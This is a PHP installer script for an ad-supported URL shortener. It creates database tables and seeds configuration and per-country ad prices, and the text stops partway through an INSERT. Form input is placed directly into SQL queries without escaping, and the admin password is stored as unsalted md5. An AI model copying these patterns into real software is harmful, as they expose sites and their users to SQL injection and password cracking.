﻿<?php
/*******************************************************************************
 * Quick Installer
 *
 * @created     02/01/2011
 * @modified    04/24/2011
 * @program     URL Shortener
 * @author      Nadeem Syed <nsyed19@gmail.com>
 ******************************************************************************/
 
//error_reporting(E_ALL ^ (E_NOTICE ^ E_WARNING));
//require_once '../../global.php';

define('SITE_LOCATION', '../../');

require_once '../../inc/const.inc.php';
require_once '../../inc/system.class.php';
require_once '../../inc/database.class.php';
require_once '../../template.php';

System::setDB(new MySQL(MYSQL_HOST, MYSQL_USER, MYSQL_PASS, MYSQL_DB));
System::setUser(new User($_GLOBAL['TABLES']['USERS'], 0, System::getDB()));

if (isset($_POST['install'])) {
	$TABLE_PREPEND = TABLE_PREPEND;
	$SITE_NAME = $_POST['site_name'];
	$SITE_PAGE_TITLE = $_POST['site_page_title'];
	$SITE_LOCATION = $_POST['site_location'];
	$SITE_SUPPORT_EMAIL = $_POST['site_support_email'];
	$SITE_REPLY_EMAIL = $_POST['site_reply_email'];
	$SITE_SESSION_PREPEND = $_POST['site_session_prepend'];
	$SITE_PAYPAL_EMAIL = $_POST['site_paypal_email'];
	$SITE_PAYPAL_CALLBACK_URL = $_POST['site_paypal_callback_url'];
	$SITE_PAYPAL_CHECKOUT_LOGO = $_POST['site_paypal_checkout_logo'];
	$SITE_CURRENCY = $_POST['site_currency'];
	$MINIMUM_PAYOUT = $_POST['minimum_payout'];
	$BAD_URL_LIST = $_POST['bad_url_list'];
	
	$ADMIN_USERNAME = $_POST['admin_username'];
	$ADMIN_PASSWORD = md5($_POST['admin_password']);

	$tables = array();
	
	$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}admins` (
	  `id` int(3) NOT NULL auto_increment,
	  `user` varchar(100) NOT NULL,
	  `pass` varchar(100) NOT NULL,
	  `perms` tinyint(3) NOT NULL,
	  `activity` datetime NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
	$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}analyzer` (
	  `id` int(100) unsigned NOT NULL auto_increment,
	  `lid` int(100) unsigned NOT NULL,
	  `oid` int(100) unsigned NOT NULL COMMENT 'owner id',
	  `aid` int(100) unsigned NOT NULL,
	  `ipaddr` varchar(20) character set utf8 collate utf8_bin default NULL,
	  `country` char(2) character set utf8 collate utf8_bin default NULL,
	  `referrer` varchar(255) character set utf8 collate utf8_bin default NULL,
	  `date` date default NULL,
	  `earned` decimal(5,5) NOT NULL,
	  `banner_click` tinyint(1) NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
	$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}campaigns` (
	  `id` int(100) unsigned NOT NULL auto_increment,
	  `uid` int(100) unsigned NOT NULL,
	  `website_name` varchar(150) NOT NULL,
	  `website_url` varchar(255) NOT NULL,
	  `website_banner` varchar(255) NOT NULL,
	  `total_clicks` int(100) unsigned NOT NULL,
	  `views_left` int(100) unsigned NOT NULL,
	  `spent_today` decimal(5,5) NOT NULL,
	  `daily_budget` decimal(5,2) NOT NULL,
	  `advert_type` enum('Interstitial','Banner') NOT NULL default 'Interstitial',
	  `created` datetime NOT NULL,
	  `status` tinyint(1) NOT NULL default '0',
	  `packages` varchar(255) NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}config` (
	  `key` varchar(100) NOT NULL,
	  `value` varchar(255) NOT NULL,
	  UNIQUE KEY `key` (`key`)
	) ENGINE=MyISAM DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}links` (
	  `id` bigint(100) unsigned NOT NULL auto_increment,
	  `long_url` longtext NOT NULL,
	  `short_url` varchar(255) character set latin1 collate latin1_general_cs NOT NULL,
	  `title` varchar(255) NOT NULL,
	  `adtype` enum('Interstitial','Top Banner','None') NOT NULL default 'Interstitial',
	  `views` bigint(100) unsigned NOT NULL default '0',
	  `earned` decimal(5,5) NOT NULL,
	  `post_date` timestamp NOT NULL default CURRENT_TIMESTAMP,
	  `user` int(100) NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}news` (
	  `id` int(50) NOT NULL auto_increment,
	  `message` varchar(500) NOT NULL,
	  `date` timestamp NOT NULL default CURRENT_TIMESTAMP,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}packages` (
	  `id` int(100) NOT NULL auto_increment,
	  `code` char(2) NOT NULL,
	  `name` varchar(100) NOT NULL,
	  `special` varchar(100) NOT NULL,
	  `price` decimal(5,2) NOT NULL default '0.00',
	  `active` tinyint(1) NOT NULL default '0',
	  `zorder` int(3) NOT NULL default '0',
	  `advert_type` enum('Interstitial','Banner') NOT NULL default 'Interstitial',
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}payouts` (
	  `id` int(100) unsigned NOT NULL auto_increment,
	  `code` char(2) NOT NULL,
	  `name` varchar(100) NOT NULL,
	  `u_interstitial` decimal(5,2) NOT NULL,
	  `u_top_banner` decimal(5,2) NOT NULL,
	  `r_interstitial` decimal(5,2) NOT NULL,
	  `r_top_banner` decimal(5,2) NOT NULL,
	  `active` tinyint(1) NOT NULL,
	  `zorder` int(3) NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}payouts_made` (
	  `id` int(100) unsigned NOT NULL auto_increment,
	  `date` datetime NOT NULL,
	  `payee` varchar(255) NOT NULL,
	  `amount` decimal(10,2) NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}transactions` (
	  `id` int(100) unsigned NOT NULL auto_increment,
	  `userid` int(100) unsigned NOT NULL,
	  `email` varchar(255) NOT NULL,
	  `ptype` varchar(100) NOT NULL,
	  `txnid` varchar(255) NOT NULL,
	  `status` enum('Pending','Hold','Completed') NOT NULL,
	  `subtotal` decimal(5,2) NOT NULL,
	  `packages` varchar(255) NOT NULL,
	  `notes` text NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM DEFAULT CHARSET=latin1;
MYSQL;
$tables[] = <<< MYSQL
	CREATE TABLE `{$TABLE_PREPEND}users` (
	  `id` int(100) NOT NULL auto_increment,
	  `name` varchar(255) NOT NULL,
	  `username` varchar(100) default NULL,
	  `email` varchar(255) NOT NULL,
	  `pass` varchar(50) NOT NULL,
	  `code` varchar(255) NOT NULL,
	  `atype` enum('Shrinker','Advertiser') NOT NULL default 'Shrinker',
	  `astatus` tinyint(1) NOT NULL default '0' COMMENT '0=unverified, 1=verified, 2=banned',
	  `address` varchar(255) NOT NULL COMMENT 'serialized',
	  `city_town` varchar(100) NOT NULL,
	  `state_county` varchar(100) NOT NULL,
	  `zipcode` varchar(10) NOT NULL,
	  `country` varchar(100) NOT NULL,
	  `telephone` varchar(20) NOT NULL,
	  `acc_type` enum('Personal','Business') NOT NULL,
	  `ga_code` varchar(100) NOT NULL,
	  `payment_processor` varchar(100) NOT NULL,
	  `payment_email` varchar(255) NOT NULL,
	  `refid` int(100) unsigned NOT NULL,
	  `ref_earned` decimal(5,5) NOT NULL,
	  `available_earning` decimal(5,5) NOT NULL,
	  `joined` timestamp NOT NULL default CURRENT_TIMESTAMP,
	  `activity` timestamp NOT NULL default '0000-00-00 00:00:00',
	  `notes` text NOT NULL,
	  PRIMARY KEY  (`id`),
	  UNIQUE KEY `email` (`email`)
	) ENGINE=MyISAM  DEFAULT CHARSET=latin1;
MYSQL;

	$data = array();
	
	$data[] = <<< MYSQL
	INSERT INTO `{$TABLE_PREPEND}admins` (`id`, `user`, `pass`, `perms`, `activity`) VALUES
	(1, '{$ADMIN_USERNAME}', '{$ADMIN_PASSWORD}', 10, '');
MYSQL;
	$data[] = <<< MYSQL
	INSERT INTO `{$TABLE_PREPEND}config` (`key`, `value`) VALUES
	('SITE_NAME', '{$SITE_NAME}'),
	('SITE_PAGE_TITLE', '{$SITE_PAGE_TITLE}'),
	('SITE_LOCATION', '{$SITE_LOCATION}'),
	('SITE_SUPPORT_EMAIL', '{$SITE_SUPPORT_EMAIL}'),
	('SITE_REPLY_EMAIL', '{$SITE_REPLY_EMAIL}'),
	('SITE_SESSION_PREPEND', '{$SITE_SESSION_PREPEND}'),
	('SITE_PAYPAL_EMAIL', '{$SITE_PAYPAL_EMAIL}'),
	('SITE_PAYPAL_CALLBACK_URL', '{$SITE_PAYPAL_CALLBACK_URL}'),
	('SITE_PAYPAL_CHECKOUT_LOGO', '{$SITE_PAYPAL_CHECKOUT_LOGO}'),
	('SITE_CURRENCY', '{$SITE_CURRENCY}'),
	('MINIMUM_PAYOUT', '{$MINIMUM_PAYOUT}'),
	('BAD_URL_LIST', '{$BAD_URL_LIST}');
MYSQL;
	$data[] = <<< MYSQL
	INSERT INTO `{$TABLE_PREPEND}packages` (`id`, `code`, `name`, `special`, `price`, `active`, `zorder`, `advert_type`) VALUES
	(1, 'O1', 'Worldwide Deal', 'HIGH AVAILABILITY!', 2.00, 1, -2, 'Interstitial'),
	(2, 'A1', 'Proxy Traffic Deal', '', 0.80, 1, -1, 'Interstitial'),
	(3, 'US', 'United States', '', 5.00, 1, 0, 'Interstitial'),
	(4, 'GB', 'United Kingdom', '', 4.00, 1, 0, 'Interstitial'),
	(5, 'AF', 'Afghanistan', '', 0.00, 0, 0, 'Interstitial'),
	(6, 'AL', 'Albania', '', 0.00, 0, 0, 'Interstitial'),
	(7, 'DZ', 'Algeria', '', 1.00, 1, 0, 'Interstitial'),
	(8, 'AS', 'American Samoa', '', 0.00, 0, 0, 'Interstitial'),
	(9, 'AD', 'Andorra', '', 0.00, 0, 0, 'Interstitial'),
	(10, 'AO', 'Angola', '', 0.00, 0, 0, 'Interstitial'),
	(11, 'AI', 'Anguilla', '', 0.00, 0, 0, 'Interstitial'),
	(12, 'AQ', 'Antarctica', '', 0.00, 0, 0, 'Interstitial'),
	(13, 'AG', 'Antigua And Barbuda', '', 0.00, 0, 0, 'Interstitial'),
	(14, 'AR', 'Argentina', '', 1.00, 1, 0, 'Interstitial'),
	(15, 'AM', 'Armenia', '', 0.00, 0, 0, 'Interstitial'),
	(16, 'AW', 'Aruba', '', 0.00, 0, 0, 'Interstitial'),
	(17, 'AU', 'Australia', '', 3.00, 1, 0, 'Interstitial'),
	(18, 'AT', 'Austria', '', 2.00, 1, 0, 'Interstitial'),
	(19, 'AZ', 'Azerbaijan', '', 0.00, 0, 0, 'Interstitial'),
	(20, 'BS', 'Bahamas', '', 0.00, 0, 0, 'Interstitial'),
	(21, 'BH', 'Bahrain', '', 0.00, 0, 0, 'Interstitial'),
	(22, 'BD', 'Bangladesh', '', 1.00, 1, 0, 'Interstitial'),
	(23, 'BB', 'Barbados', '', 0.00, 0, 0, 'Interstitial'),
	(24, 'BY', 'Belarus', '', 0.00, 0, 0, 'Interstitial'),
	(25, 'BE', 'Belgium', '', 2.00, 1, 0, 'Interstitial'),
	(26, 'BZ', 'Belize', '', 0.00, 0, 0, 'Interstitial'),
	(27, 'BJ', 'Benin', '', 0.00, 0, 0, 'Interstitial'),
	(28, 'BM', 'Bermuda', '', 0.00, 0, 0, 'Interstitial'),
	(29, 'BT', 'Bhutan', '', 0.00, 0, 0, 'Interstitial'),
	(30, 'BO', 'Bolivia', '', 0.00, 0, 0, 'Interstitial'),
	(31, 'BA', 'Bosnia And Herzegowina', '', 1.50, 1, 0, 'Interstitial'),
	(32, 'BW', 'Botswana', '', 0.00, 0, 0, 'Interstitial'),
	(33, 'BV', 'Bouvet Island', '', 0.00, 0, 0, 'Interstitial'),
	(34, 'BR', 'Brazil', '', 1.50, 1, 0, 'Interstitial'),
	(35, 'IO', 'British Indian Ocean Territory', '', 0.00, 0, 0, 'Interstitial'),
	(36, 'BN', 'Brunei Darussalam', '', 0.00, 0, 0, 'Interstitial'),
	(37, 'BG', 'Bulgaria', '', 1.00, 1, 0, 'Interstitial'),
	(38, 'BF', 'Burkina Faso', '', 0.00, 0, 0, 'Interstitial'),
	(39, 'BI', 'Burundi', '', 0.00, 0, 0, 'Interstitial'),
	(40, 'KH', 'Cambodia', '', 0.00, 0, 0, 'Interstitial'),
	(41, 'CM', 'Cameroon', '', 0.00, 0, 0, 'Interstitial'),
	(42, 'CA', 'Canada', '', 3.00, 1, 0, 'Interstitial'),
	(43, 'CV', 'Cape Verde', '', 0.00, 0, 0, 'Interstitial'),
	(44, 'KY', 'Cayman Islands', '', 0.00, 0, 0, 'Interstitial'),
	(45, 'CF', 'Central African Republic', '', 0.00, 0, 0, 'Interstitial'),
	(46, 'TD', 'Chad', '', 0.00, 0, 0, 'Interstitial'),
	(47, 'CL', 'Chile', '', 1.00, 1, 0, 'Interstitial'),
	(48, 'CN', 'China', '', 2.00, 1, 0, 'Interstitial'),
	(49, 'CX', 'Christmas Island', '', 0.00, 0, 0, 'Interstitial'),
	(50, 'CC', 'Cocos (Keeling) Islands', '', 0.00, 0, 0, 'Interstitial'),
	(51, 'CO', 'Colombia', '', 1.00, 1, 0, 'Interstitial'),
	(52, 'KM', 'Comoros', '', 0.00, 0, 0, 'Interstitial'),
	(53, 'CG', 'Congo', '', 0.00, 0, 0, 'Interstitial'),
	(54, 'CD', 'Congo, The Democratic Republic Of The', '', 0.00, 0, 0, 'Interstitial'),
	(55, 'CK', 'Cook Islands', '', 0.00, 0, 0, 'Interstitial'),
	(56, 'CR', 'Costa Rica', '', 0.00, 0, 0, 'Interstitial'),
	(57, 'CI', 'Cote D''Ivoire', '', 0.00, 0, 0, 'Interstitial'),
	(58, 'HR', 'Croatia (Local Name: Hrvatska)', '', 1.50, 1, 0, 'Interstitial'),
	(59, 'CU', 'Cuba', '', 0.00, 0, 0, 'Interstitial'),
	(60, 'CY', 'Cyprus', '', 3.00, 1, 0, 'Interstitial'),
	(61, 'CZ', 'Czech Republic', '', 2.00, 1, 0, 'Interstitial'),
	(62, 'DK', 'Denmark', '', 2.00, 1, 0, 'Interstitial'),
	(63, 'DJ', 'Djibouti', '', 0.00, 0, 0, 'Interstitial'),
	(64, 'DM', 'Dominica', '', 0.00, 0, 0, 'Interstitial'),
	(65, 'DO', 'Dominican Republic', '', 0.00, 0, 0, 'Interstitial'),
	(66, 'TP', 'East Timor', '', 0.00, 0, 0, 'Interstitial'),
	(67, 'EC', 'Ecuador', '', 1.00, 1, 0, 'Interstitial'),
	(68, 'EG', 'Egypt', '', 1.00, 1, 0, 'Interstitial'),
	(69, 'SV', 'El Salvador', '', 0.00, 0, 0, 'Interstitial'),
	(70, 'GQ', 'Equatorial Guinea', '', 0.00, 0, 0, 'Interstitial'),
	(71, 'ER', 'Eritrea', '', 0.00, 0, 0, 'Interstitial'),
	(72, 'EE', 'Estonia', '', 0.00, 0, 0, 'Interstitial'),
	(73, 'ET', 'Ethiopia', '', 2.00, 0, 0, 'Interstitial'),
	(74, 'FK', 'Falkland Islands (Malvinas)', '', 25.10, 0, 0, 'Interstitial'),
	(75, 'FO', 'Faroe Islands', '', 2.00, 0, 0, 'Interstitial'),
	(76, 'FJ', 'Fiji', '', 3.00, 0, 0, 'Interstitial'),
	(77, 'FI', 'Finland', '', 2.00, 1, 0, 'Interstitial'),
	(78, 'FR', 'France', '', 3.00, 1, 0, 'Interstitial'),
	(79, 'FX', 'France, Metropolitan', '', 0.00, 0, 0, 'Interstitial'),
	(80, 'GF', 'French Guiana', '', 0.00, 0, 0, 'Interstitial'),
	(81, 'PF', 'French Polynesia', '', 0.00, 0, 0, 'Interstitial'),
	(82, 'TF', 'French Southern Territories', '', 0.00, 0, 0, 'Interstitial'),
	(83, 'GA', 'Gabon', '', 0.00, 0, 0, 'Interstitial'),
	(84, 'GM', 'Gambia', '', 0.00, 0, 0, 'Interstitial'),
	(85, 'GE', 'Georgia', '', 0.00, 0, 0, 'Interstitial'),
	(86, 'DE', 'Germany', '', 3.00, 1, 0, 'Interstitial'),
	(87, 'GH', 'Ghana', '', 0.00, 0, 0, 'Interstitial'),
	(88, 'GI', 'Gibraltar', '', 0.00, 0, 0, 'Interstitial'),
	(89, 'GR', 'Greece', '', 3.00, 1, 0, 'Interstitial'),
	(90, 'GL', 'Greenland', '', 0.00, 0, 0, 'Interstitial'),
	(91, 'GD', 'Grenada', '', 0.00, 0, 0, 'Interstitial'),
	(92, 'GP', 'Guadeloupe', '', 0.00, 0, 0, 'Interstitial'),
	(93, 'GU', 'Guam', '', 0.00, 0, 0, 'Interstitial'),
	(94, 'GT', 'Guatemala', '', 0.00, 0, 0, 'Interstitial'),
	(95, 'GN', 'Guinea', '', 0.00, 0, 0, 'Interstitial'),
	(96, 'GW', 'Guinea-Bissau', '', 0.00, 0, 0, 'Interstitial'),
	(97, 'GY', 'Guyana', '', 0.00, 0, 0, 'Interstitial'),
	(98, 'HT', 'Haiti', '', 0.00, 0, 0, 'Interstitial'),
	(99, 'HM', 'Heard And Mc Donald Islands', '', 0.00, 0, 0, 'Interstitial'),
	(100, 'VA', 'Holy See (Vatican City State)', '', 0.00, 0, 0, 'Interstitial'),
	(101, 'HN', 'Honduras', '', 0.00, 0, 0, 'Interstitial'),
	(102, 'HK', 'Hong Kong', '', 2.00, 1, 0, 'Interstitial'),
	(103, 'HU', 'Hungary', '', 2.00, 1, 0, 'Interstitial'),
	(104, 'IS', 'Iceland', '', 0.00, 0, 0, 'Interstitial'),
	(105, 'IN', 'India', '', 2.00, 1, 0, 'Interstitial'),
	(106, 'ID', 'Indonesia', '', 0.50, 1, 0, 'Interstitial'),
	(107, 'IR', 'Iran (Islamic Republic Of)', '', 0.00, 0, 0, 'Interstitial'),
	(108, 'IQ', 'Iraq', '', 0.00, 0, 0, 'Interstitial'),
	(109, 'IE', 'Ireland', '', 3.00, 1, 0, 'Interstitial'),
	(110, 'IL', 'Israel', '', 1.00, 1, 0, 'Interstitial'),
	(111, 'IT', 'Italy', '', 2.00, 1, 0, 'Interstitial'),
	(112, 'JM', 'Jamaica', '', 0.00, 0, 0, 'Interstitial'),
	(113, 'JP', 'Japan', '', 2.00, 1, 0, 'Interstitial'),
	(114, 'JO', 'Jordan', '', 0.00, 0, 0, 'Interstitial'),
	(115, 'KZ', 'Kazakhstan', '', 0.00, 0, 0, 'Interstitial'),
	(116, 'KE', 'Kenya', '', 0.00, 0, 0, 'Interstitial'),
	(117, 'KI', 'Kiribati', '', 0.00, 0, 0, 'Interstitial'),
	(118, 'KP', 'Korea, Democratic People''s Republic Of', '', 0.00, 0, 0, 'Interstitial'),
	(119, 'KR', 'Korea, Republic Of', '', 3.00, 1, 0, 'Interstitial'),
	(120, 'KW', 'Kuwait', '', 0.00, 0, 0, 'Interstitial'),
	(121, 'KG', 'Kyrgyzstan', '', 0.00, 0, 0, 'Interstitial'),
	(122, 'LA', 'Lao People''s Democratic Republic', '', 0.00, 0, 0, 'Interstitial'),
	(123, 'LV', 'Latvia', '', 2.00, 1, 0, 'Interstitial'),
	(124, 'LB', 'Lebanon', '', 0.00, 0, 0, 'Interstitial'),
	(125, 'LS', 'Lesotho', '', 0.00, 0, 0, 'Interstitial'),
	(126, 'LR', 'Liberia', '', 0.00, 0, 0, 'Interstitial'),
	(127, 'LY', 'Libyan Arab Jamahiriya', '', 1.00, 1, 0, 'Interstitial'),
	(128, 'LI', 'Liechtenstein', '', 0.00, 0, 0, 'Interstitial'),
	(129, 'LT', 'Lithuania', '', 1.00, 1, 0, 'Interstitial'),
	(130, 'LU', 'Luxembourg', '', 0.00, 0, 0, 'Interstitial'),
	(131, 'MO', 'Macau', '', 1.00, 1, 0, 'Interstitial'),
	(132, 'MK', 'Macedonia, Former Yugoslav Republic Of', '', 1.00, 1, 0, 'Interstitial'),
	(133, 'MG', 'Madagascar', '', 0.00, 0, 0, 'Interstitial'),
	(134, 'MW', 'Malawi', '', 0.00, 0, 0, 'Interstitial'),
	(135, 'MY', 'Malaysia', '', 1.00, 1, 0, 'Interstitial'),
	(136, 'MV', 'Maldives', '', 0.00, 0, 0, 'Interstitial'),
	(137, 'ML', 'Mali', '', 0.00, 0, 0, 'Interstitial'),
	(138, 'MT', 'Malta', '', 0.00, 0, 0, 'Interstitial'),
	(139, 'MH', 'Marshall Islands', '', 0.00, 0, 0, 'Interstitial'),
	(140, 'MQ', 'Martinique', '', 0.00, 0, 0, 'Interstitial'),
	(141, 'MR', 'Mauritania', '', 0.00, 0, 0, 'Interstitial'),
	(142, 'MU', 'Mauritius', '', 0.00, 0, 0, 'Interstitial'),
	(143, 'YT', 'Mayotte', '', 0.00, 0, 0, 'Interstitial'),
	(144, 'MX', 'Mexico', '', 1.00, 1, 0, 'Interstitial'),
	(145, 'FM', 'Micronesia, Federated States Of', '', 0.00, 0, 0, 'Interstitial'),
	(146, 'MD', 'Moldova, Republic Of', '', 0.00, 0, 0, 'Interstitial'),
	(147, 'MC', 'Monaco', '', 0.00, 0, 0, 'Interstitial'),
	(148, 'MN', 'Mongolia', '', 0.00, 0, 0, 'Interstitial'),
	(149, 'MS', 'Montserrat', '', 0.00, 0, 0, 'Interstitial'),
	(150, 'MA', 'Morocco', '', 1.00, 1, 0, 'Interstitial'),
	(151, 'MZ', 'Mozambique', '', 0.00, 0, 0, 'Interstitial'),
	(152, 'MM', 'Myanmar', '', 0.00, 0, 0, 'Interstitial'),
	(153, 'NA', 'Namibia', '', 0.00, 0, 0, 'Interstitial'),
	(154, 'NR', 'Nauru', '', 0.00, 0, 0, 'Interstitial'),
	(155, 'NP', 'Nepal', '', 0.00, 0, 0, 'Interstitial'),
	(156, 'NL', 'Netherlands', '', 3.00, 1, 0, 'Interstitial'),
	(157, 'AN', 'Netherlands Antilles', '', 0.00, 0, 0, 'Interstitial'),
	(158, 'NC', 'New Caledonia', '', 0.00, 0, 0, 'Interstitial'),
	(159, 'NZ', 'New Zealand', '', 3.00, 1, 0, 'Interstitial'),
	(160, 'NI', 'Nicaragua', '', 0.00, 0, 0, 'Interstitial'),
	(161, 'NE', 'Niger', '', 0.00, 0, 0, 'Interstitial'),
	(162, 'NG', 'Nigeria', '', 0.00, 0, 0, 'Interstitial'),
	(163, 'NU', 'Niue', '', 0.00, 0, 0, 'Interstitial'),
	(164, 'NF', 'Norfolk Island', '', 0.00, 0, 0, 'Interstitial'),
	(165, 'MP', 'Northern Mariana Islands', '', 0.00, 0, 0, 'Interstitial'),
	(166, 'NO', 'Norway', '', 2.00, 1, 0, 'Interstitial'),
	(167, 'OM', 'Oman', '', 0.00, 0, 0, 'Interstitial'),
	(168, 'PK', 'Pakistan', '', 1.00, 1, 0, 'Interstitial'),
	(169, 'PW', 'Palau', '', 1.00, 0, 0, 'Interstitial'),
	(170, 'PA', 'Panama', '', 0.00, 0, 0, 'Interstitial'),
	(171, 'PG', 'Papua New Guinea', '', 0.00, 0, 0, 'Interstitial'),
	(172, 'PY', 'Paraguay', '', 0.00, 0, 0, 'Interstitial'),
	(173, 'PE', 'Peru', '', 1.00, 1, 0, 'Interstitial'),
	(174, 'PH', 'Philippines', '', 1.00, 1, 0, 'Interstitial'),
	(175, 'PN', 'Pitcairn', '', 0.00, 0, 0, 'Interstitial'),
	(176, 'PL', 'Poland', '', 2.00, 1, 0, 'Interstitial'),
	(177, 'PT', 'Portugal', '', 2.00, 1, 0, 'Interstitial'),
	(178, 'PR', 'Puerto Rico', '', 0.00, 0, 0, 'Interstitial'),
	(179, 'QA', 'Qatar', '', 0.00, 0, 0, 'Interstitial'),
	(180, 'RE', 'Reunion', '', 0.00, 0, 0, 'Interstitial'),
	(181, 'RO', 'Romania', '', 2.00, 1, 0, 'Interstitial'),
	(182, 'RU', 'Russian Federation', '', 1.00, 1, 0, 'Interstitial'),
	(183, 'RW', 'Rwanda', '', 0.00, 0, 0, 'Interstitial'),
	(184, 'KN', 'Saint Kitts And Nevis', '', 0.00, 0, 0, 'Interstitial'),
	(185, 'LC', 'Saint Lucia', '', 0.00, 0, 0, 'Interstitial'),
	(186, 'VC', 'Saint Vincent And The Grenadines', '', 0.00, 0, 0, 'Interstitial'),
	(187, 'WS', 'Samoa', '', 0.00, 0, 0, 'Interstitial'),
	(188, 'SM', 'San Marino', '', 0.00, 0, 0, 'Interstitial'),
	(189, 'ST', 'Sao Tome And Principe', '', 0.00, 0, 0, 'Interstitial'),
	(190, 'SA', 'Saudi Arabia', '', 1.00, 1, 0, 'Interstitial'),
	(191, 'SN', 'Senegal', '', 0.00, 0, 0, 'Interstitial'),
	(192, 'SC', 'Seychelles', '', 0.00, 0, 0, 'Interstitial'),
	(193, 'SL', 'Sierra Leone', '', 0.00, 0, 0, 'Interstitial'),
	(194, 'SG', 'Singapore', '', 3.00, 1, 0, 'Interstitial'),
	(195, 'SK', 'Slovakia (Slovak Republic)', '', 2.00, 1, 0, 'Interstitial'),
	(196, 'SI', 'Slovenia', '', 1.00, 1, 0, 'Interstitial'),
	(197, 'SB', 'Solomon Islands', '', 0.00, 0, 0, 'Interstitial'),
	(198, 'SO', 'Somalia', '', 0.00, 0, 0, 'Interstitial'),
	(199, 'ZA', 'South Africa', '', 3.00, 1, 0, 'Interstitial'),
	(200, 'GS', 'South Georgia, South Sandwich Islands', '', 0.00, 0, 0, 'Interstitial'),
	(201, 'ES', 'Spain', '', 2.00, 1, 0, 'Interstitial'),
	(202, 'LK', 'Sri Lanka', '', 0.00, 0, 0, 'Interstitial'),
	(203, 'SH', 'St. Helena', '', 0.00, 0, 0, 'Interstitial'),
	(204, 'PM', 'St. Pierre And Miquelon', '', 0.00, 0, 0, 'Interstitial'),
	(205, 'SD', 'Sudan', '', 0.00, 0, 0, 'Interstitial'),
	(206, 'SR', 'Suriname', '', 0.00, 0, 0, 'Interstitial'),
	(207, 'SJ', 'Svalbard And Jan Mayen Islands', '', 0.00, 0, 0, 'Interstitial'),
	(208, 'SZ', 'Swaziland', '', 0.00, 0, 0, 'Interstitial'),
	(209, 'SE', 'Sweden', '', 2.00, 1, 0, 'Interstitial'),
	(210, 'CH', 'Switzerland', '', 2.00, 1, 0, 'Interstitial'),
	(211, 'SY', 'Syrian Arab Republic', '', 0.00, 0, 0, 'Interstitial'),
	(212, 'TW', 'Taiwan', '', 1.00, 1, 0, 'Interstitial'),
	(213, 'TJ', 'Tajikistan', '', 0.00, 0, 0, 'Interstitial'),
	(214, 'TZ', 'Tanzania, United Republic Of', '', 0.00, 0, 0, 'Interstitial'),
	(215, 'TH', 'Thailand', '', 0.50, 1, 0, 'Interstitial'),
	(216, 'TG', 'Togo', '', 0.00, 0, 0, 'Interstitial'),
	(217, 'TK', 'Tokelau', '', 0.00, 0, 0, 'Interstitial'),
	(218, 'TO', 'Tonga', '', 0.00, 0, 0, 'Interstitial'),
	(219, 'TT', 'Trinidad And Tobago', '', 0.00, 0, 0, 'Interstitial'),
	(220, 'TN', 'Tunisia', '', 1.00, 1, 0, 'Interstitial'),
	(221, 'TR', 'Turkey', '', 3.00, 1, 0, 'Interstitial'),
	(222, 'TM', 'Turkmenistan', '', 0.00, 0, 0, 'Interstitial'),
	(223, 'TC', 'Turks And Caicos Islands', '', 0.00, 0, 0, 'Interstitial'),
	(224, 'TV', 'Tuvalu', '', 0.00, 0, 0, 'Interstitial'),
	(225, 'UG', 'Uganda', '', 0.00, 0, 0, 'Interstitial'),
	(226, 'UA', 'Ukraine', '', 1.00, 1, 0, 'Interstitial'),
	(227, 'AE', 'United Arab Emirates', '', 3.05, 1, 0, 'Interstitial'),
	(228, 'UM', 'United States Minor Outlying Islands', '', 0.00, 0, 0, 'Interstitial'),
	(229, 'UY', 'Uruguay', '', 0.00, 0, 0, 'Interstitial'),
	(230, 'UZ', 'Uzbekistan', '', 0.00, 0, 0, 'Interstitial'),
	(231, 'VU', 'Vanuatu', '', 0.00, 0, 0, 'Interstitial'),
	(232, 'VE', 'Venezuela', '', 2.00, 1, 0, 'Interstitial'),
	(233, 'VN', 'Viet Nam', '', 0.50, 1, 0, 'Interstitial'),
	(234, 'VG', 'Virgin Islands (British)', '', 0.00, 0, 0, 'Interstitial'),
	(235, 'VI', 'Virgin Islands (U.S.)', '', 0.00, 0, 0, 'Interstitial'),
	(236, 'WF', 'Wallis And Futuna Islands', '', 0.00, 0, 0, 'Interstitial'),
	(237, 'EH', 'Western Sahara', '', 0.00, 0, 0, 'Interstitial'),
	(238, 'YE', 'Yemen', '', 0.00, 0, 0, 'Interstitial'),
	(239, 'YU', 'Yugoslavia', '', 0.00, 0, 0, 'Interstitial'),
	(240, 'ZM', 'Zambia', '', 0.00, 0, 0, 'Interstitial'),
	(241, 'ZW', 'Zimbabwe', '', 0.00, 0, 0, 'Interstitial'),
	(242, 'O1', 'Worldwide Deal', 'HIGH AVAILABILITY!', 0.40, 1, -2, 'Banner'),
	(243, 'A1', 'Proxy Traffic Deal', '', 0.11, 1, -1, 'Banner'),
	(244, 'US', 'United States', '', 1.00, 1, 0, 'Banner'),
	(245, 'GB', 'United Kingdom', '', 1.00, 1, 0, 'Banner'),
